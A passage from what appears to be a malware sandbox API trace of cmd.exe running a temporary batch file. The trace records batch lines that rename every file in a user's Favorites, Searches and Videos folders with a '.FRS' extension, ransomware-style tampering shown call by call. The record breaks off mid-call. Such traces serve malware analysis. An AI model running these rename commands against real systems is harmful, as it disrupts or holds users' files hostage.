(_String1="ren", _String2="DIR") returned 14 [0035.213] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0035.213] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0035.213] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0035.213] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0035.213] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0035.214] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0035.214] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0035.214] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0035.214] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0035.214] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0035.214] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0035.214] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0035.214] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0035.214] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0035.214] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0035.214] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0035.214] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0035.214] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0035.214] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.214] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.214] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xc8eb68, nVolumeNameSize=0x104, lpVolumeSerialNumber=0xc8eb60, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xc8eb60*=0xba2ee5af, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0035.214] _wcsicmp (_String1="*.*", _String2=".") returned -4 [0035.214] _wcsicmp (_String1="*.*", _String2="..") returned -4 [0035.214] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Favorites\\*.*" (normalized: "c:\\users\\5jghkoaofdp\\favorites\\*.*")) returned 0xffffffff [0035.215] GetLastError () returned 0x7b [0035.215] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xd18248 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0035.215] SetErrorMode (uMode=0x0) returned 0x0 [0035.215] SetErrorMode (uMode=0x1) returned 0x0 [0035.215] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Favorites\\*.*", nBufferLength=0x104, lpBuffer=0xc8e4f8, lpFilePart=0xc8e4cc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Favorites\\*.*", lpFilePart=0xc8e4cc*="*.*") returned 0x22 [0035.215] SetErrorMode (uMode=0x0) returned 0x1 [0035.215] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Favorites" (normalized: "c:\\users\\5jghkoaofdp\\favorites")) returned 0x11 [0035.215] _wcsicmp (_String1="*.*", _String2=".") returned -4 [0035.215] _wcsicmp (_String1="*.*", _String2="..") returned -4 [0035.215] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Favorites\\*.*" (normalized: "c:\\users\\5jghkoaofdp\\favorites\\*.*")) returned 0xffffffff [0035.215] GetLastError () returned 0x7b [0035.215] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Favorites\\*.*", fInfoLevelId=0x1, lpFindFileData=0xd17fe8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xd17fe8) returned 0xd19008 [0035.215] FindNextFileW (in: hFindFile=0xd19008, lpFindFileData=0xd17fe8 | out: lpFindFileData=0xd17fe8) returned 1 [0035.215] FindNextFileW (in: hFindFile=0xd19008, lpFindFileData=0xd17fe8 | out: lpFindFileData=0xd17fe8) returned 1 [0035.215] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Favorites\\Bing.url" (normalized: "c:\\users\\5jghkoaofdp\\favorites\\bing.url"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Favorites\\Bing.url.FRS" (normalized: "c:\\users\\5jghkoaofdp\\favorites\\bing.url.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.216] FindNextFileW (in: hFindFile=0xd19008, lpFindFileData=0xd17fe8 | out: lpFindFileData=0xd17fe8) returned 1 [0035.216] FindNextFileW (in: hFindFile=0xd19008, lpFindFileData=0xd17fe8 | out: lpFindFileData=0xd17fe8) returned 1 [0035.216] FindNextFileW (in: hFindFile=0xd19008, lpFindFileData=0xd17fe8 | out: lpFindFileData=0xd17fe8) returned 0 [0035.216] GetLastError () returned 0x12 [0035.216] FindClose (in: hFindFile=0xd19008 | out: hFindFile=0xd19008) returned 1 [0035.216] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.216] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0035.217] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.217] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0035.217] _get_osfhandle (_FileHandle=0) returned 0x24 [0035.217] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0035.217] SetConsoleInputExeNameW () returned 0x1 [0035.217] GetConsoleOutputCP () returned 0x1b5 [0035.217] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0035.217] SetThreadUILanguage (LangId=0x0) returned 0x409 [0035.218] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x94 [0035.218] _open_osfhandle (_OSFileHandle=0x94, _Flags=8) returned 3 [0035.218] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.218] SetFilePointer (in: hFile=0x94, lDistanceToMove=341, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0035.218] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.218] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0035.218] ReadFile (in: hFile=0x94, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x919, lpOverlapped=0x0) returned 1 [0035.218] SetFilePointer (in: hFile=0x94, lDistanceToMove=389, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0035.218] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Searches\\*.*\" *.*.FRS\r\n\n\r\np.txt\"')do set n=%%i\r\n") returned 48 [0035.218] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.218] GetFileType (hFile=0x94) returned 0x1 [0035.218] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.218] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0035.218] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="5JgHKoaOfdp") returned 0xb [0035.219] _wcsicmp (_String1="ren", _String2=")") returned 73 [0035.219] _wcsicmp (_String1="FOR", _String2="ren") returned -12 [0035.219] _wcsicmp (_String1="FOR/?", _String2="ren") returned -12 [0035.219] _wcsicmp (_String1="IF", _String2="ren") returned -9 [0035.219] _wcsicmp (_String1="IF/?", _String2="ren") returned -9 [0035.219] _wcsicmp (_String1="REM", _String2="ren") returned -1 [0035.219] _wcsicmp (_String1="REM/?", _String2="ren") returned -1 [0035.219] _tell (_FileHandle=3) returned 389 [0035.219] _close (_FileHandle=3) returned 0 [0035.219] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0035.219] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0035.219] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0035.219] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0035.219] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0035.219] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0035.219] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0035.219] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0035.219] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0035.219] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0035.220] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0035.220] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0035.220] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0035.220] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0035.220] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0035.220] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0035.220] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0035.220] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0035.220] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0035.220] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.220] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.220] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xc8eb68, nVolumeNameSize=0x104, lpVolumeSerialNumber=0xc8eb60, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xc8eb60*=0xba2ee5af, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0035.220] _wcsicmp (_String1="*.*", _String2=".") returned -4 [0035.220] _wcsicmp (_String1="*.*", _String2="..") returned -4 [0035.220] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Searches\\*.*" (normalized: "c:\\users\\5jghkoaofdp\\searches\\*.*")) returned 0xffffffff [0035.220] GetLastError () returned 0x7b [0035.220] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xd18248 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0035.220] SetErrorMode (uMode=0x0) returned 0x0 [0035.221] SetErrorMode (uMode=0x1) returned 0x0 [0035.221] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Searches\\*.*", nBufferLength=0x104, lpBuffer=0xc8e4f8, lpFilePart=0xc8e4cc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Searches\\*.*", lpFilePart=0xc8e4cc*="*.*") returned 0x21 [0035.221] SetErrorMode (uMode=0x0) returned 0x1 [0035.221] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Searches" (normalized: "c:\\users\\5jghkoaofdp\\searches")) returned 0x11 [0035.221] _wcsicmp (_String1="*.*", _String2=".") returned -4 [0035.221] _wcsicmp (_String1="*.*", _String2="..") returned -4 [0035.221] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Searches\\*.*" (normalized: "c:\\users\\5jghkoaofdp\\searches\\*.*")) returned 0xffffffff [0035.221] GetLastError () returned 0x7b [0035.221] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Searches\\*.*", fInfoLevelId=0x1, lpFindFileData=0xd17fe8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xd17fe8) returned 0xd19008 [0035.221] FindNextFileW (in: hFindFile=0xd19008, lpFindFileData=0xd17fe8 | out: lpFindFileData=0xd17fe8) returned 1 [0035.221] FindNextFileW (in: hFindFile=0xd19008, lpFindFileData=0xd17fe8 | out: lpFindFileData=0xd17fe8) returned 1 [0035.221] FindNextFileW (in: hFindFile=0xd19008, lpFindFileData=0xd17fe8 | out: lpFindFileData=0xd17fe8) returned 1 [0035.221] FindNextFileW (in: hFindFile=0xd19008, lpFindFileData=0xd17fe8 | out: lpFindFileData=0xd17fe8) returned 1 [0035.221] FindNextFileW (in: hFindFile=0xd19008, lpFindFileData=0xd17fe8 | out: lpFindFileData=0xd17fe8) returned 1 [0035.221] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Searches\\winrt--{S-1-5-21-3643094112-4209292109-138530109-1001}-.searchconnector-ms" (normalized: "c:\\users\\5jghkoaofdp\\searches\\winrt--{s-1-5-21-3643094112-4209292109-138530109-1001}-.searchconnector-ms"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Searches\\winrt--{S-1-5-21-3643094112-4209292109-138530109-1001}-.searchconnector-ms.FRS" (normalized: "c:\\users\\5jghkoaofdp\\searches\\winrt--{s-1-5-21-3643094112-4209292109-138530109-1001}-.searchconnector-ms.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.222] FindNextFileW (in: hFindFile=0xd19008, lpFindFileData=0xd17fe8 | out: lpFindFileData=0xd17fe8) returned 0 [0035.222] GetLastError () returned 0x12 [0035.222] FindClose (in: hFindFile=0xd19008 | out: hFindFile=0xd19008) returned 1 [0035.222] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.222] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0035.222] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.222] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0035.222] _get_osfhandle (_FileHandle=0) returned 0x24 [0035.222] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0035.223] SetConsoleInputExeNameW () returned 0x1 [0035.223] GetConsoleOutputCP () returned 0x1b5 [0035.223] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0035.223] SetThreadUILanguage (LangId=0x0) returned 0x409 [0035.223] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x94 [0035.223] _open_osfhandle (_OSFileHandle=0x94, _Flags=8) returned 3 [0035.223] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.223] SetFilePointer (in: hFile=0x94, lDistanceToMove=389, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0035.224] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.224] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0035.224] ReadFile (in: hFile=0x94, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x8e9, lpOverlapped=0x0) returned 1 [0035.224] SetFilePointer (in: hFile=0x94, lDistanceToMove=435, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0035.224] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=46, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Videos\\*.*\" *.*.FRS\r\n\r\n\n\r\np.txt\"')do set n=%%i\r\n") returned 46 [0035.224] GetFileType (hFile=0x94) returned 0x1 [0035.224] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.224] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0035.224] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="5JgHKoaOfdp") returned 0xb [0035.225] _wcsicmp (_String1="ren", _String2=")") returned 73 [0035.225] _wcsicmp (_String1="FOR", _String2="ren") returned -12 [0035.225] _wcsicmp (_String1="FOR/?", _String2="ren") returned -12 [0035.225] _wcsicmp (_String1="IF", _String2="ren") returned -9 [0035.225] _wcsicmp (_String1="IF/?", _String2="ren") returned -9 [0035.225] _wcsicmp (_String1="REM", _String2="ren") returned -1 [0035.225] _wcsicmp (_String1="REM/?", _String2="ren") returned -1 [0035.225] _tell (_FileHandle=3) returned 435 [0035.225] _close (_FileHandle=3) returned 0 [0035.225] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0035.225] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0035.225] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0035.225] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0035.225] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0035.225] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0035.225] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0035.225] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0035.225] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0035.225] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0035.225] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0035.225] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0035.226] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0035.226] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0035.226] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0035.226] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0035.226] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0035.226] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0035.226] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0035.226] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.226] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.226] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xc8eb68, nVolumeNameSize=0x104, lpVolumeSerialNumber=0xc8eb60, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xc8eb60*=0xba2ee5af, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0035.226] _wcsicmp (_String1="*.*", _String2=".") returned -4 [0035.226] _wcsicmp (_String1="*.*", _String2="..") returned -4 [0035.226] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Videos\\*.*" (normalized: "c:\\users\\5jghkoaofdp\\videos\\*.*")) returned 0xffffffff [0035.226] GetLastError () returned 0x7b [0035.226] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xd181d8 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0035.226] SetErrorMode (uMode=0x0) returned 0x0 [0035.226] SetErrorMode (uMode=0x1) returned 0x0 [0035.226] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Videos\\*.*", nBufferLength=0x104, lpBuffer=0xc8e4f8, lpFilePart=0xc8e4cc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Videos\\*.*", lpFilePart=0xc8e4cc*="*.*") returned 0x1f [0035.226] SetErrorMode (uMode=0x0) returned 0x1 [0035.226] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Videos" (normalized: "c:\\users\\5jghkoaofdp\\videos")) returned 0x11 [0035.226] _wcsicmp (_String1="*.*", _String2=".") returned -4 [0035.226] _wcsicmp (_String1="*.*", _String2="..") returned -4 [0035.226] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Videos\\*.*" (normalized: "c:\\users\\5jghkoaofdp\\videos\\*.*")) returned 0xffffffff [0035.227] GetLastError () returned 0x7b [0035.227] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Videos\\*.*", fInfoLevelId=0x1, lpFindFileData=0xd17f78, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xd17f78) returned 0xd18648 [0035.227] FindNextFileW (in: hFindFile=0xd18648, lpFindFileData=0xd17f78 | out: lpFindFileData=0xd17f78) returned 1 [0035.227] FindNextFileW (in: hFindFile=0xd18648, lpFindFileData=0xd17f78 | out: lpFindFileData=0xd17f78) returned 1 [0035.227] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Videos\\3cYkmEN1QsqDL.avi" (normalized: "c:\\users\\5jghkoaofdp\\videos\\3cykmen1qsqdl.avi"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Videos\\3cYkmEN1QsqDL.avi.FRS" (normalized: "c:\\users\\5jghkoaofdp\\videos\\3cykmen1qsqdl.avi.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.228] FindNextFileW (in: hFindFile=0xd18648, lpFindFileData=0xd17f78 | out: lpFindFileData=0xd17f78) returned 1 [0035.228] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Videos\\4 eVMh.flv" (normalized: "c:\\users\\5jghkoaofdp\\videos\\4 evmh.flv"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Videos\\4 eVMh.flv.FRS" (normalized: "c:\\users\\5jghkoaofdp\\videos\\4 evmh.flv.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.229] FindNextFileW (in: hFindFile=0xd18648, lpFindFileData=0xd17f78 | out: lpFindFileData=0xd17f78) returned 1 [0035.229] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Videos\\75rmilKeT_cE3woc7.mkv" (normalized: "c:\\users\\5jghkoaofdp\\videos\\75rmilket_ce3woc7.mkv"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Videos\\75rmilKeT_cE3woc7.mkv.FRS" (normalized: "c:\\users\\5jghkoaofdp\\videos\\75rmilket_ce3woc7.mkv.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.229] FindNextFileW (in: hFindFile=0xd18648, lpFindFileData=0xd17f78 | out: lpFindFileData=0xd17f78) returned 1 [0035.229] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Videos\\8tPCnCitib7vSPP8vwp.flv" (normalized: "c:\\users\\5jghkoaofdp\\videos\\8tpcncitib7vspp8vwp.flv"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Videos\\8tPCnCitib7vSPP8vwp.flv.FRS" (normalized: "c:\\users\\5jghkoaofdp\\videos\\8tpcncitib7vspp8vwp.flv.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.230] FindNextFileW (in: hFindFile=0xd18648, lpFindFileData=0xd17f78 | out: lpFindFileData=0xd17f78) returned 1 [0035.230] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Videos\\c0W0rxzRwZ.swf" (normalized: "c:\\users\\5jghkoaofdp\\videos\\c0w0rxzrwz.swf"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Videos\\c0W0rxzRwZ.swf.FRS" (normalized: "c:\\users\\5jghkoaofdp\\videos\\c0w0rxzrwz.swf.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.230] FindNextFileW (in: hFindFile=0xd18648, lpFindFileData=0xd17f78 | out: lpFindFileData=0xd17f78) returned 1 [0035.231] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Videos\\cZF7I.swf" (normalized: "c:\\users\\5jghkoaofdp\\videos\\czf7i.swf"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Videos\\cZF7I.swf.FRS" (normalized: "c:\\users\\5jghkoaofdp\\videos\\czf7i.swf.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.231] FindNextFileW (in: hFindFile=0xd18648, lpFindFileData=0xd17f78 | out: lpFindFileData=0xd17f78) returned 1 [0035.231] FindNextFileW (in: hFindFile=0xd18648, lpFindFileData=0xd17f78 | out: lpFindFileData=0xd17f78) returned 1 [0035.231] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Videos\\dL_eqDExsJoZJ_texJ21.flv" (normalized: "c:\\users\\5jghkoaofdp\\videos\\dl_eqdexsjozj_texj21.flv"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Videos\\dL_eqDExsJoZJ_texJ21.flv.FRS" (normalized: "c:\\users\\5jghkoaofdp\\videos\\dl_eqdexsjozj_texj21.flv.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.231] FindNextFileW (in: hFindFile=0xd18648, lpFindFileData=0xd17f78 | out: lpFindFileData=0xd17f78) returned 1 [0035.231] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Videos\\F5szn_EaYBFCsfN.avi" (normalized: "c:\\users\\5jghkoaofdp\\videos\\f5szn_eaybfcsfn.avi"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Videos\\F5szn_EaYBFCsfN.avi.FRS" (normalized: "c:\\users\\5jghkoaofdp\\videos\\f5szn_eaybfcsfn.avi.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.232] FindNextFileW (in: hFindFile=0xd18648, lpFindFileData=0xd17f78 | out: lpFindFileData=0xd17f78) returned 1 [0035.232] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Videos\\f7Q9Iv6Zau.swf" (normalized: "c:\\users\\5jghkoaofdp\\videos\\f7q9iv6zau.swf"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Videos\\f7Q9Iv6Zau.swf.FRS" (normalized: "c:\\users\\5jghkoaofdp\\videos\\f7q9iv6zau.swf.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.232] FindNextFileW (in: hFindFile=0xd18648, lpFindFileData=0xd17f78 | out: lpFindFileData=0xd17f78) returned 1 [0035.232] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Videos\\hLWevmAs58agwM.flv" (normalized: "c:\\users\\5jghkoaofdp\\videos\\hlwevmas58agwm.flv"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Videos\\hLWevmAs58agwM.flv.FRS" (normalized: "c:\\users\\5jghkoaofdp\\videos\\hlwevmas58agwm.flv.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.233] FindNextFileW (in: hFindFile=0xd18648, lpFindFileData=0xd17f78 | out: lpFindFileData=0xd17f78) returned 1 [0035.233] FindNextFileW (in: hFindFile=0xd18648, lpFindFileData=0xd17f78 | out: lpFindFileData=0xd17f78) returned 1 [0035.233] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Videos\\L 1ID.mkv" (normalized: "c:\\users\\5jghkoaofdp\\videos\\l 1id.mkv"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Videos\\L 1ID.mkv.FRS" (normalized: "c:\\users\\5jghkoaofdp\\videos\\l 1id.mkv.frs"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0035.233] FindNextFileW (in: hFindFile=0xd18648, lpFindFileData=0xd17f78 | out: lpFindFileData=0xd17f78) returned 1 [0035.233] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\5JgHKoaOfdp\\Videos\\nuWem4__4.mp4" (normalized: "c:\\users\\5jghkoaofdp\\videos\\nuwem4__4.mp4"), lpNewFileName="C:\\Users\\5JgHKoaOfdp\\Videos\\nuWem4__4.mp4.FRS" (normalized: "c:\\users\\5jghkoaofdp\\videos\\nuwem4__4.mp4.frs"), 